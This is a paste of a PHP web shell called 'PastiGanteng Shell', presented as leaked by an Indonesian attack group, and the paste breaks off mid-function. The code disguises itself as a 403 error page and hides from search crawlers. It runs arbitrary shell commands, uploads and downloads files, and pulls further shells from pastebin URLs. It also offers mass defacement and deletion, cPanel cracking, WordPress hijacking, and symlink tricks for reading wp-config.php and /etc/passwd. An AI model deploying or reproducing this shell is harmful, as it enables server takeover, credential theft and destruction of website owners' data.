· 7 years ago · Sep 27, 2018, 01:44 AM
1Leaked by : PELITABANGSA .CA
2[ INDONESIA CYBER ATTACK AND MALWARE ANALYST ]
3<?php
4
5$auth_pass = "dacffae94acdb77294f2033ce4f23ead"; // default : PastiGanteng
6
7session_start();
8error_reporting(0);
9set_time_limit(0);
10@set_magic_quotes_runtime(0);
11@clearstatcache();
12@ini_set('error_log',NULL);
13@ini_set('log_errors',0);
14@ini_set('max_execution_time',0);
15@ini_set('output_buffering',0);
16@ini_set('display_errors', 0);
17
18$color = "#00ff00";
19$default_action = 'FilesMan';
20$default_use_ajax = true;
21$default_charset = 'UTF-8';
22if(!empty($_SERVER['HTTP_USER_AGENT'])) {
23 $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
24 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
25 header('HTTP/1.0 404 Not Found');
26 exit;
27 }
28}
29
30function login_shell() {
31?>
32<html>
33<head>
34<?php
35$forbid = ($_SERVER['PHP_SELF']);
36echo "<title>403 Forbidden</title>
37</head>
38<body><h1>Forbidden</h1>
39<p>You don't have permission to access ".$forbid." on this server.</p>";
40if($_GET['ganteng'] == 'login') {
41echo '
42<style>
43
44html {
45 margin: 20px auto;
46 background: #000000;
47 text-align: center;
48}
49
50h1,p {
51 display: none;
52}
53header {
54 margin: 10px auto;
55 color: lightblue;
56 font-family: Arial;
57}
58input[type=password],input[type=text] {
59 margin: 3px auto;
60 width: 250px;
61 height: 25px;
62 color: red;
63 background: #000000;
64 border: 1px solid #333;
65 padding: 5px;
66 text-align: center;
67 cursor: text;
68}
69
70input[type=submit] {
71 margin: 3px;
72 width: 50px;
73 height: 33px;
74 border: 1px solid #333;
75 cursor: pointer;
76 border-radius: 3px;
77 background: #000;
78 color: red;
79}
80
81
82a {
83 opacity: 0.6
84}
85
86a:hover {
87 opacity: 1;
88}
89
90</style>
91
92<header>
93<span style="font-size: 30px; font-weight: bold; font-style: italic;">PastiGanteng Shell</span>
94<br>
95<span style="font-size: 13px; font-weight: bold;">Final</span>
96<br>
97<br>
98<a href="https://www.facebook.com/SCyberArt/" target="_blank"><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTguFp1dPZHmSCRUTouRQNJOPfIEg1ih9B02QPW5SzutriHDt4xhA" width="300px" height="300px"></a>
99</h2>
100</header>
101<br>
102
103<form method="post">
104<input type="text" value="Xmall75" title="Username" disabled>
105<br>
106<input type="password" name="pass" title="Password">
107<br>
108<input type="submit" value=">>">
109<br>
110</form>
111<br>
112<span style="color: #eee; size: 15px; font-family: Calibri; font-weight: bold;"> Hello </span><span style="font-family: Arial; font-style: italic; color: red; size: 15px;">'.$_SERVER['REMOTE_ADDR'].'</span>
113</center>';
114}
115?>
116<?php
117exit;
118}
119
120$forbid = ($_SERVER['PHP_SELF']);
121
122if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
123 if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) )) {
124 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
125 echo '<script type="text/javascript"> window.location="'.$forbid.'" </script>';
126 }
127 else
128 login_shell();
129if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
130 @ob_clean();
131 $file = $_GET['file'];
132 header('Content-Description: File Transfer');
133 header('Content-Type: application/octet-stream');
134 header('Content-Disposition: attachment; filename="'.basename($file).'"');
135 header('Expires: 0');
136 header('Cache-Control: must-revalidate');
137 header('Pragma: public');
138 header('Content-Length: ' . filesize($file));
139 readfile($file);
140 exit;
141}
142?>
143<html>
144<head>
145<title><?php $judul = ($_SERVER['SERVER_NAME']); echo "".$judul.""; ?> - PastiGanteng Shell </title>
146<meta name='author' content='Xmall75'>
147<meta charset="UTF-8">
148<style type='text/css'>
149@import url(https://fonts.googleapis.com/css?family=Ubuntu);
150html {
151 background: #000000;
152 color: gold;
153 font-family: Arial;
154 font-size: 13px;
155 width: 100%;
156}
157
158div.header {
159 left: 0;
160 width: 37%;
161 height: 27%;
162 text-align: center;
163}
164
165div.header img {
166 float: left;
167 vertical-align: middle;
168 padding: 10px;
169 padding-right: 25px;
170 border-right: 2px solid #333;
171}
172
173div.header span#kepala {
174 color: #eee;
175 font-size: 30px;
176 font-weight: bold;
177 cursor: pointer;
178}
179
180div.header span#kepala:hover {
181 color: lightskyblue;
182}
183
184.menu span {
185 margin: 5px;
186 margin-bottom: 10px;
187}
188
189table, th, td {
190 border-collapse:collapse;
191 font-family: Tahoma, Geneva, sans-serif;
192 background: transparent;
193 font-family: 'Ubuntu';
194 font-size: 13px;
195}
196.table_home, .th_home, .td_home {
197 border: 1px solid #333;
198}
199
200.th_home {
201 background: #333;
202 color: lightblue;
203}
204
205.td_home a:hover {
206 color: lightskyblue;
207}
208
209.table_home tr:hover {
210 background: #333;
211 color: lightskyblue;
212}
213
214th {
215 padding: 10px;
216}
217
218.menu span a {
219 color: lightblue;
220 text-decoration: none;
221 background: #333;
222 margin: 5px auto;
223 padding: 5px;
224 border-radius: 4px;
225 opacity: 0.8;
226}
227
228.menu span a:hover {
229 opacity : 1;
230 text-decoration: none;
231}
232
233a {
234 color: #ff0000;
235 text-decoration: none;
236}
237a:hover {
238 text-decoration: underline;
239}
240
241input[type=text], input[type=password],input[type=submit],input[type=file] {
242 background: transparent;
243 color: #fff;
244 border: 1px solid #333;
245 margin: 5px auto;
246 padding-left: 5px;
247 font-family: 'Ubuntu';
248 font-size: 13px;
249}
250
251textarea {
252 border: 1px solid #333;
253 width: 100%;
254 height: 400px;
255 padding-left: 5px;
256 margin: 10px auto;
257 resize: none;
258 background: transparent;
259 color: #ffffff;
260 font-family: 'Ubuntu';
261 font-size: 13px;
262}
263
264select {
265 width: 152px;
266 background: #000000;
267 color: lime;
268 border: 1px solid #333;
269 margin: 5px auto;
270 padding-left: 5px;
271 font-family: 'Ubuntu';
272 font-size: 13px;
273 cursor: pointer;
274}
275
276option {
277 cursor: pointer;
278}
279
280option.lightblue {
281 color: lightblue;
282 cursor: pointer;
283}
284
285option.red {
286 color: red;
287 cursor: pointer;
288}
289
290</style>
291</head>
292<?php
293
294function w($dir,$perm) {
295 if(!is_writable($dir)) {
296 return "<font color=red>".$perm."</font>";
297 } else {
298 return "<font color=lime>".$perm."</font>";
299 }
300}
301function r($dir,$perm) {
302 if(!is_readable($dir)) {
303 return "<font color=red>".$perm."</font>";
304 } else {
305 return "<font color=lime>".$perm."</font>";
306 }
307}
308function exe($cmd) {
309 if(function_exists('system')) {
310 @ob_start();
311 @system($cmd);
312 $buff = @ob_get_contents();
313 @ob_end_clean();
314 return $buff;
315 } elseif(function_exists('exec')) {
316 @exec($cmd,$results);
317 $buff = "";
318 foreach($results as $result) {
319 $buff .= $result;
320 } return $buff;
321 } elseif(function_exists('passthru')) {
322 @ob_start();
323 @passthru($cmd);
324 $buff = @ob_get_contents();
325 @ob_end_clean();
326 return $buff;
327 } elseif(function_exists('shell_exec')) {
328 $buff = @shell_exec($cmd);
329 return $buff;
330 }
331}
332function perms($file){
333 $perms = fileperms($file);
334 if (($perms & 0xC000) == 0xC000) {
335 // Socket
336 $info = 's';
337 } elseif (($perms & 0xA000) == 0xA000) {
338 // Symbolic Link
339 $info = 'l';
340 } elseif (($perms & 0x8000) == 0x8000) {
341 // Regular
342 $info = '-';
343 } elseif (($perms & 0x6000) == 0x6000) {
344 // Block special
345 $info = 'b';
346 } elseif (($perms & 0x4000) == 0x4000) {
347 // Directory
348 $info = 'd';
349 } elseif (($perms & 0x2000) == 0x2000) {
350 // Character special
351 $info = 'c';
352 } elseif (($perms & 0x1000) == 0x1000) {
353 // FIFO pipe
354 $info = 'p';
355 } else {
356 // Unknown
357 $info = 'u';
358 }
359 // Owner
360 $info .= (($perms & 0x0100) ? 'r' : '-');
361 $info .= (($perms & 0x0080) ? 'w' : '-');
362 $info .= (($perms & 0x0040) ?
363 (($perms & 0x0800) ? 's' : 'x' ) :
364 (($perms & 0x0800) ? 'S' : '-'));
365 // Group
366 $info .= (($perms & 0x0020) ? 'r' : '-');
367 $info .= (($perms & 0x0010) ? 'w' : '-');
368 $info .= (($perms & 0x0008) ?
369 (($perms & 0x0400) ? 's' : 'x' ) :
370 (($perms & 0x0400) ? 'S' : '-'));
371 // World
372 $info .= (($perms & 0x0004) ? 'r' : '-');
373 $info .= (($perms & 0x0002) ? 'w' : '-');
374 $info .= (($perms & 0x0001) ?
375 (($perms & 0x0200) ? 't' : 'x' ) :
376 (($perms & 0x0200) ? 'T' : '-'));
377 return $info;
378}
379function hdd($s) {
380 if($s >= 1073741824)
381 return sprintf('%1.2f',$s / 1073741824 ).' GB';
382 elseif($s >= 1048576)
383 return sprintf('%1.2f',$s / 1048576 ) .' MB';
384 elseif($s >= 1024)
385 return sprintf('%1.2f',$s / 1024 ) .' KB';
386 else
387 return $s .' B';
388}
389function ambilKata($param, $kata1, $kata2){
390 if(strpos($param, $kata1) === FALSE) return FALSE;
391 if(strpos($param, $kata2) === FALSE) return FALSE;
392 $start = strpos($param, $kata1) + strlen($kata1);
393 $end = strpos($param, $kata2, $start);
394 $return = substr($param, $start, $end - $start);
395 return $return;
396}
397function getsource($url) {
398 $curl = curl_init($url);
399 curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
400 curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
401 curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
402 curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
403 $content = curl_exec($curl);
404 curl_close($curl);
405 return $content;
406}
407function bing($dork) {
408 $npage = 1;
409 $npages = 30000;
410 $allLinks = array();
411 $lll = array();
412 while($npage <= $npages) {
413 $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
414 if($x) {
415 preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
416 foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
417 $npage = $npage + 10;
418 if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0) break;
419 } else break;
420 }
421 $URLs = array();
422 foreach($allLinks as $url){
423 $exp = explode("/", $url);
424 $URLs[] = $exp[2];
425 }
426 $array = array_filter($URLs);
427 $array = array_unique($array);
428 $sss = count(array_unique($array));
429 foreach($array as $domain) {
430 echo $domain."\n";
431 }
432}
433function reverse($url) {
434 $ch = curl_init("http://domains.yougetsignal.com/domains.php");
435 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
436 curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
437 curl_setopt($ch, CURLOPT_HEADER, 0);
438 curl_setopt($ch, CURLOPT_POST, 1);
439 $resp = curl_exec($ch);
440 $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
441 $array = explode(",,", $resp);
442 unset($array[0]);
443 foreach($array as $lnk) {
444 $lnk = "http://$lnk";
445 $lnk = str_replace(",", "", $lnk);
446 echo $lnk."\n";
447 ob_flush();
448 flush();
449 }
450 curl_close($ch);
451}
452if(get_magic_quotes_gpc()) {
453 function idx_ss($array) {
454 return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
455 }
456 $_POST = idx_ss($_POST);
457 $_COOKIE = idx_ss($_COOKIE);
458}
459
460if(isset($_GET['dir'])) {
461 $dir = $_GET['dir'];
462 chdir($dir);
463} else {
464 $dir = getcwd();
465}
466$kernel = php_uname();
467$ip = gethostbyname($_SERVER['HTTP_HOST']);
468$dir = str_replace("\\","/",$dir);
469$scdir = explode("/", $dir);
470$freespace = hdd(disk_free_space("/"));
471$total = hdd(disk_total_space("/"));
472$used = $total - $freespace;
473$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
474$ds = @ini_get("disable_functions");
475$mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
476$mysqli = (function_exists('mysqli_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
477$curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
478$wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
479$perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
480$python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
481$bash = (exe('bash --version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
482$show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
483
484
485function summonshell($names,$lokasi){
486 if ( $_GET['create'] == $names ){
487$a = "".$_SERVER['SERVER_NAME']."";
488$b = dirname($_SERVER['PHP_SELF']);
489$c = "/pastiganteng_tooler/".$names.".php";
490if (file_exists('pastiganteng_tooler/'.$names.'.php')){
491 echo '<script type="text/javascript">alert("File Exists > Click Ok to access");window.location.href = "pastiganteng_tooler/'.$names.'.php";</script> ';
492 }
493 else {mkdir("pastiganteng_tooler/", 0777);
494file_put_contents('pastiganteng_tooler/'.$names.'.php', file_get_contents($lokasi));
495echo ' <script type="text/javascript">alert("Done > Click Ok to access");window.location.href = "pastiganteng_tooler/'.$names.'.php";</script> ';}}}
496
497summonshell("ganteng1","http://pastebin.com/raw/BHcw07ZX");
498summonshell("45v17","http://pastebin.com/raw/vLT4QiSt");
499summonshell("wso251","http://pastebin.com/raw/BXmWGhMu");
500summonshell("wso28","http://pastebin.com/raw/BSj2SzEw");
501summonshell("wso30","http://pastebin.com/raw/M4NnspFA");
502summonshell("b374k","http://pastebin.com/raw/rZiyaRGV");
503summonshell("injection","http://pastebin.com/raw/nxxL8c1f");
504summonshell("blackhat","http://pastebin.com/raw/3L2ESWeu");
505summonshell("brudul","http://pastebin.com/raw/PQaeQF2Y");
506summonshell("mad2","http://pastebin.com/raw/1JeJttTn");
507summonshell("idx2","http://pastebin.com/raw/bQwmSeEG");
508summonshell("idx3","http://pastebin.com/raw/NuzRiZif");
509summonshell("noname","http://pastebin.com/raw/i201SrEy");
510
511
512if(!function_exists('posix_getegid')) {
513 $user = @get_current_user();
514 $uid = @getmyuid();
515 $gid = @getmygid();
516 $group = "?";
517} else {
518 $uid = @posix_getpwuid(posix_geteuid());
519 $gid = @posix_getgrgid(posix_getegid());
520 $user = $uid['name'];
521 $uid = $uid['uid'];
522 $group = $gid['name'];
523 $gid = $gid['gid'];
524}
525
526$software = getenv("SERVER_SOFTWARE");
527$serverport = $_SERVER["SERVER_PORT"];
528$adminserver=$_SERVER['SERVER_ADMIN'];
529
530echo "<br>";
531?>
532<div class='header'><img src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTguFp1dPZHmSCRUTouRQNJOPfIEg1ih9B02QPW5SzutriHDt4xhA' width='130px' height='130px'><br><br><br><br><span id='kepala' onclick="alert('PastiGanteng Shell - Xmall75');">PastiGanteng Shell</span>
533<?php
534echo "<br><span style='color: #eee; font-size: 12px; font-weight: bold;'> Final </span></div>";
535echo "<hr color='#333'>";
536echo "<br>";
537echo '<center><a href="https://www.facebook.com/SCyberArt/" target="_blank"><span style="font-weight: bold; font-size: 15px;"><font color="lime">Security Cyber Art</font></span></a><span style="color: #eee; font-size: 15px; font-weight: bold;"> - We Will Make Art On Your Security</span></center>';
538echo "<br>";
539echo "System: <font color=red>".$kernel."</font><br>";
540echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=red>".$_SERVER['REMOTE_ADDR']."</font> | Server Port: <font color=red>".$serverport."</font> | Admin: <font color=lime>".$adminserver."</font><br>";
541echo "Software: <font color=red>".$software."</font><br>";
542echo "User: <font color=red>".$user."</font> (".$uid.") Group: <font color=red>".$group."</font> (".$gid.")<br>";
543echo "HDD: <font color=red>$used</font> / <font color=red>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
544echo "PHP Version: <font color=red>".phpversion()."</font> on <font color=lime>".php_sapi_name()."</font><br>";
545echo "Disable Functions: ".$show_ds." on <font color=lime>".php_sapi_name()."</font><br>";
546echo "Safe Mode: $sm<br>";
547echo "MySQL: $mysql | MySQLi: $mysqli | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl | Bash: $bash <br>";
548echo "</center>";
549echo "<br>";
550echo "<form method='post'>
551 <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
552 <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
553 </form>";
554 if($_POST['do_cmd']) {
555 echo "<pre>".exe($_POST['cmd'])."</pre>";
556 }
557echo "<form method='post' enctype='multipart/form-data'>
558 <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
559 <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
560 <input type='file' name='ix_file'>
561 <input type='submit' value='upload' name='upload'>
562 </form>";
563if($_POST['upload']) {
564 if($_POST['tipe_upload'] == 'biasa') {
565 if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
566 echo "<font color=lime>Uploaded!</font> at <i><b><font color=lightskyblue>$dir/".$_FILES['ix_file']['name']."</font></b></i>";
567 } else {
568 echo "<font color=red>failed to upload file</font>";
569 }
570 } else {
571 $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
572 $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
573 if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
574 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
575 echo "<font color=lime>Uploaded!</font> at <i><b><font color=lightskyblue>$root </font> => </b></i><a href='http://$web' target='_blank'>$web</a>";
576 } else {
577 echo "<font color=red>failed to upload file</font>";
578 }
579 } else {
580 echo "<font color=red>failed to upload file</font>";
581 }
582 }
583 }
584echo "<hr color='#333'>";
585echo "<center>";
586echo "<form method='get'>Jump Dir: <input type='text' style='width: 300px;' name='dir' value='".$dir."'><input type='submit' value='>>'></form>";
587echo "Current DIR: ";
588foreach($scdir as $c_dir => $cdir) {
589 echo "<a href='?dir=";
590 for($i = 0; $i <= $c_dir; $i++) {
591 echo $scdir[$i];
592 if($i != $c_dir) {
593 echo "/";
594 }
595 }
596 echo "'>$cdir</a>/";
597}
598echo " [ ".w($dir, perms($dir))." ]";
599echo "<div class='menu'>";
600echo "<br>";
601echo "<br>";
602echo "<span><a href='?dir=$dir&do=mass_deface'>Mass Deface</a></span>";
603echo "<span><a href='?dir=$dir&do=mass_delete'>Mass Delete</a></span>";
604echo "<span><a href='?dir=$dir&do=config'>Config</a></span>";
605echo "<span><a href='?dir=$dir&do=config2'>Config V.2</a></span>";
606echo "<span><a href='?dir=$dir&do=vhost'>Bypass Symlink vHost</a></span>";
607echo "<span><a href='?dir=$dir&do=jumping'>Jumping</a></span>";
608echo "<span><a href='?dir=$dir&do=cpanel'>CPanel Crack</a></span>";
609echo "<span><a href='?dir=$dir&do=domain'>Domains Viewer</a></span>";
610echo "<span><a href='?dir=$dir&do=server'>Server Info</a></span>";
611echo "<span><a href='?dir=$dir&do=hashid'>Hash Identify</a></span>";
612echo "<span><a style='color: red; font-weight: bold;' href='?'>Home</a></span>";
613echo "<br>";
614echo "<br>";
615echo "<span><a href='?dir=$dir&do=zip_menu'>Zip Menu</a></span>";
616echo "<span><a href='?dir=$dir&do=smtp'>SMTP Grabber</a></span>";
617echo "<span><a href='?dir=$dir&do=zoneh'>Zone-H</a></span>";
618echo "<span><a href='?dir=$dir&do=symlink'>Symlink Tools</a></span>";
619echo "<span><a href='?dir=$dir&do=cgi'>CGI Telnet</a></span>";
620echo "<span><a href='?dir=$dir&do=network'>network</a></span>";
621echo "<span><a href='?dir=$dir&do=adminer'>Adminer</a></span>";
622echo "<span><a href='?dir=$dir&do=fake_root'>Fake Root</a></span>";
623echo "<span><a href='?dir=$dir&do=hasher'>Password Hasher</a></span>";
624echo "<span><a href='?dir=$dir&do=cms_detect'>CMS Detector</a></span>";
625echo "<span><a href='?dir=$dir&do=whois'>Whois</a></span>";
626echo "<span><a href='?dir=$dir&do=shell_check'>Shell Checker</a></span>";
627echo "<span><a href='?dir=$dir&do=contact'>Contact</a></span>";
628echo "<span><a style='color: red; font-weight: bold;' href='?dir=$dir&do=kill'>Kill</a></span>";
629echo "<br>";
630echo "<br>";
631echo "<span><a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a></span>";
632echo "<span><a href='?dir=$dir&do=auto_wp'>Auto Edit Title WP</a></span>";
633echo "<span><a href='?dir=$dir&do=auto_dwp'>WP Auto Deface</a></span>";
634echo "<span><a href='?dir=$dir&do=auto_dwp2'>WP Auto Deface V.2</a></span>";
635echo "<span><a href='?dir=$dir&do=wp_hijack'>WP Hijack</a></span>";
636echo "<span><a href='?dir=$dir&do=wprespw'>WP Reset Password</a></span>";
637echo "<span><a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a></span>";
638echo "<span><a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a></span>";
639echo "<span><a href='?dir=$dir&do=log_hunter'>Log Hunter</a></span>";
640echo "<span><a href='?dir=$dir&do=csrf'>CSRF Online</a></span>";
641echo "<span><a style='color: red; font-weight: bold;' href='?logout=true'>Logout</a></span>";
642echo "</center>";
643echo "</div>";
644echo "<br>";
645echo "<hr color='#333'>";
646if($_GET['logout'] == true) {
647 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
648 echo "<script>window.location='".$_SERVER['PHP_SELF']."';</script>";
649
650} elseif($_GET['do'] == 'kill') {
651 if(@unlink(preg_replace('!(d+)s.*!', '', __FILE__)))
652 die('<center><br><center><h2>Shell removed</h2><br>Goodbye, Thanks for take my shell today</center></center>');
653 else
654 echo '<center>unlink failed!</center>';
655
656} elseif($_GET['do'] == 'mass_deface') {
657 function sabun_massal($dir,$namafile,$isi_script) {
658 if(is_writable($dir)) {
659 $dira = scandir($dir);
660 foreach($dira as $dirb) {
661 $dirc = "$dir/$dirb";
662 $lokasi = $dirc.'/'.$namafile;
663 if($dirb === '.') {
664 file_put_contents($lokasi, $isi_script);
665 } elseif($dirb === '..') {
666 file_put_contents($lokasi, $isi_script);
667 } else {
668 if(is_dir($dirc)) {
669 if(is_writable($dirc)) {
670 echo "[<font color=lime>DONE</font>] $lokasi<br>";
671 file_put_contents($lokasi, $isi_script);
672 $idx = sabun_massal($dirc,$namafile,$isi_script);
673 }
674 }
675 }
676 }
677 }
678 }
679 function sabun_biasa($dir,$namafile,$isi_script) {
680 if(is_writable($dir)) {
681 $dira = scandir($dir);
682 foreach($dira as $dirb) {
683 $dirc = "$dir/$dirb";
684 $lokasi = $dirc.'/'.$namafile;
685 if($dirb === '.') {
686 file_put_contents($lokasi, $isi_script);
687 } elseif($dirb === '..') {
688 file_put_contents($lokasi, $isi_script);
689 } else {
690 if(is_dir($dirc)) {
691 if(is_writable($dirc)) {
692 echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
693 file_put_contents($lokasi, $isi_script);
694 }
695 }
696 }
697 }
698 }
699 }
700 if($_POST['start']) {
701 if($_POST['tipe_sabun'] == 'mahal') {
702 echo "<div style='margin: 5px auto; padding: 5px'>";
703 sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
704 echo "</div>";
705 } elseif($_POST['tipe_sabun'] == 'murah') {
706 echo "<div style='margin: 5px auto; padding: 5px'>";
707 sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
708 echo "</div>";
709 }
710 } else {
711 echo "<center>";
712 echo "<form method='post'>
713 <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
714 <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
715 <font style='text-decoration: underline;'>Folder:</font><br>
716 <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
717 <font style='text-decoration: underline;'>Filename:</font><br>
718 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
719 <font style='text-decoration: underline;'>Index File:</font><br>
720 <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Xmall75 - Security Cyber Art</textarea><br>
721 <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
722 </form></center>";
723 }
724} elseif($_GET['do'] == 'mass_delete') {
725 function hapus_massal($dir,$namafile) {
726 if(is_writable($dir)) {
727 $dira = scandir($dir);
728 foreach($dira as $dirb) {
729 $dirc = "$dir/$dirb";
730 $lokasi = $dirc.'/'.$namafile;
731 if($dirb === '.') {
732 if(file_exists("$dir/$namafile")) {
733 unlink("$dir/$namafile");
734 }
735 } elseif($dirb === '..') {
736 if(file_exists("".dirname($dir)."/$namafile")) {
737 unlink("".dirname($dir)."/$namafile");
738 }
739 } else {
740 if(is_dir($dirc)) {
741 if(is_writable($dirc)) {
742 if(file_exists($lokasi)) {
743 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
744 unlink($lokasi);
745 $idx = hapus_massal($dirc,$namafile);
746 }
747 }
748 }
749 }
750 }
751 }
752 }
753 if($_POST['start']) {
754 echo "<div style='margin: 5px auto; padding: 5px'>";
755 hapus_massal($_POST['d_dir'], $_POST['d_file']);
756 echo "</div>";
757 } else {
758 echo "<center>";
759 echo "<form method='post'>
760 <font style='text-decoration: underline;'>Folder:</font><br>
761 <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
762 <font style='text-decoration: underline;'>Filename:</font><br>
763 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
764 <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
765 </form></center>";
766 }
767
768} elseif($_GET['do'] == 'symlink') {
769
770 echo "<center><br><b><a style='border: 1px solid #333; background: #333; margin: 10px; padding: 10px; border-radius: 3px;' href='?dir=$dir&do=symlink1'> Symlink Server </a><br><br><br><a style='border: 1px solid #333; background: #333; margin: 10px; padding: 10px; border-radius: 3px;' href='?dir=$dir&do=symlink2'> Symlink Server 2 </a><br><br><br><a style='border: 1px solid #333; background: #333; margin: 10px; padding: 10px; border-radius: 3px;' href='?dir=$dir&do=sym404'> Bypass Symlink 404 </a></b></center><br><br><br>";
771
772
773} elseif($_GET['do'] == 'sym404') {
774
775 echo "<form method='post'><br>File Target : <br><input type='text' name='dir' value='/home/user/public_html/wp-config.php'>
776<br>Save As: <br><input type='text' name='jnck' value='ojayakan.txt'><input name='ojaykan' type='submit' value='>>'></form><br>";
777
778@ini_set('display_errors', 0);
779if($_POST['ojaykan']){
780rmdir("pastigans_sym404");mkdir("pastigans_sym404", 0777);
781$dir = $_POST['dir'];
782$jnck = $_POST['jnck'];
783system("ln -s ".$dir." pastigans_sym404/".$jnck);
784symlink($dir,"pastigans_sym404/".$jnck);
785$inija = fopen("pastigans_sym404/.htaccess", "w");
786fwrite($inija,"ReadmeName ".$jnck."
787Options Indexes FollowSymLinks
788DirectoryIndex ngeue.htm
789AddType text/plain .php
790AddHandler text/plain .php
791Satisfy Any
792");
793echo'<a href="pastigans_sym404/">Klik Gan >:(</a>';
794}
795
796
797} elseif($_GET['do'] == 'symlink1') {
798
799 $d0mains = @file("/etc/named.conf");
800##httaces
801if($d0mains){
802@mkdir("pastiganteng_sym1",0777);
803@chdir("pastiganteng_sym1");
804@exe("ln -s / root");
805$file3 = 'Options all
806DirectoryIndex Sux.html
807AddType text/plain .php
808AddHandler server-parsed .php
809AddType text/plain .html
810AddHandler txt .html
811Require None
812Satisfy Any';
813$fp3 = fopen('.htaccess','w');
814$fw3 = fwrite($fp3,$file3);@fclose($fp3);
815echo "<br><br><center><h2>Symlink Server !</h2></center><br><br>
816<table align=center border=1 style='width:60%;border-color:#333333;'>
817<tr>
818<td align=center><font size=3>S. No.</font></td>
819<td align=center><font size=3>Domains</font></td>
820<td align=center><font size=3>Users</font></td>
821<td align=center><font size=3>Symlink</font></td>
822</tr>";
823$dcount = 1;
824foreach($d0mains as $d0main){
825if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
826flush();
827if(strlen(trim($domains[1][0])) > 2){
828$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
829echo "<tr align=center><td><font size=3>" . $dcount . "</font></td>
830<td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
831<td>".$user['name']."</td>
832<td><a href='/pastiganteng_sym1/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
833flush();
834$dcount++;}}}
835echo "</table>";
836}else{
837$TEST=@file('/etc/passwd');
838if ($TEST){
839@mkdir("pastiganteng_sym1",0777);
840@chdir("pastiganteng_sym1");
841exe("ln -s / root");
842$file3 = 'Options all
843 DirectoryIndex Sux.html
844 AddType text/plain .php
845 AddHandler server-parsed .php
846 AddType text/plain .html
847 AddHandler txt .html
848 Require None
849 Satisfy Any';
850 $fp3 = fopen('.htaccess','w');
851 $fw3 = fwrite($fp3,$file3);
852 @fclose($fp3);
853 echo "<br><br><center><h2>-=Symlink Server=-</h2></center><br><br>
854 <table align=center border=1><tr>
855 <td align=center><font size=4>S. No.</font></td>
856 <td align=center><font size=4>Users</font></td>
857 <td align=center><font size=4>Symlink</font></td></tr>";
858 $dcount = 1;
